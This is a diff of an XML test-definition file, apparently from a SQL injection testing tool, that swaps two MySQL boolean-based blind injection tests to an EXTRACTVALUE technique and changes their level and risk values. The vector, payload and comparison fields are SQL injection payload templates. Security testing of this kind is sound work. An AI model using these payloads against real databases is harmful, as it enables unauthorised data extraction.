@@ -484,37 +484,37 @@ Tag: <test>
484
484
</test >
485
485
486
486
<test >
487
- <title >MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (bool*int )</title >
487
+ <title >MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE )</title >
488
488
<stype >1</stype >
489
- <level >5 </level >
490
- <risk >1 </risk >
489
+ <level >1 </level >
490
+ <risk >5 </risk >
491
491
<clause >1,2,3,8</clause >
492
492
<where >1</where >
493
- <vector >AND ([ INFERENCE])* [RANDNUM]</vector >
493
+ <vector >AND EXTRACTVALUE([RANDNUM],CASE WHEN ([ INFERENCE]) THEN [RANDNUM] ELSE 0x3A END) </vector >
494
494
<request >
495
- <payload >AND ([RANDNUM]=[RANDNUM])*[RANDNUM1] </payload >
495
+ <payload >AND EXTRACTVALUE ([RANDNUM],CASE WHEN ([RANDNUM] =[RANDNUM]) THEN [RANDNUM] ELSE 0x3A END) </payload >
496
496
</request >
497
497
<response >
498
- <comparison >AND ([RANDNUM]=[RANDNUM1])*[RANDNUM1] </comparison >
498
+ <comparison >AND EXTRACTVALUE ([RANDNUM],CASE WHEN ([RANDNUM] =[RANDNUM1]) THEN [RANDNUM] ELSE 0x3A END) </comparison >
499
499
</response >
500
500
<details >
501
501
<dbms >MySQL</dbms >
502
502
</details >
503
503
</test >
504
504
505
505
<test >
506
- <title >MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (bool*int )</title >
506
+ <title >MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE )</title >
507
507
<stype >1</stype >
508
- <level >5 </level >
509
- <risk >3 </risk >
510
- <clause >1,2,3</clause >
508
+ <level >3 </level >
509
+ <risk >5 </risk >
510
+ <clause >1,2,3,8 </clause >
511
511
<where >2</where >
512
- <vector >OR ([ INFERENCE])* [RANDNUM]</vector >
512
+ <vector >OR EXTRACTVALUE([RANDNUM],CASE WHEN ([ INFERENCE]) THEN [RANDNUM] ELSE 0x3A END) </vector >
513
513
<request >
514
- <payload >OR ([RANDNUM]=[RANDNUM])*[RANDNUM1] </payload >
514
+ <payload >OR EXTRACTVALUE ([RANDNUM],CASE WHEN ([RANDNUM] =[RANDNUM]) THEN [RANDNUM] ELSE 0x3A END) </payload >
515
515
</request >
516
516
<response >
517
- <comparison >OR ([RANDNUM]=[RANDNUM1])*[RANDNUM1] </comparison >
517
+ <comparison >OR EXTRACTVALUE ([RANDNUM],CASE WHEN ([RANDNUM] =[RANDNUM1]) THEN [RANDNUM] ELSE 0x3A END) </comparison >
518
518
</response >
519
519
<details >
520
520
<dbms >MySQL</dbms >
0 commit comments